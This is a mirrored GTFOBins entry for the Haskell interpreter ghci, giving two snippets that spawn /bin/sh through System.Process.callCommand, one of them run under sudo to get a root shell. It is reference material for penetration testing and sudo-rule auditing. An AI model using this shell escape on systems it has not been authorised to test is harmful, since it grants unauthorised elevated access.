1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-14 11:21:33 +01:00
GTFOBins.github.io/_gtfobins/ghci.md
2020-10-24 12:46:42 +02:00

12 lines
181 B
Markdown

---
functions:
shell:
- code: |
ghci
System.Process.callCommand "/bin/sh"
sudo:
- code: |
sudo ghci
System.Process.callCommand "/bin/sh"
---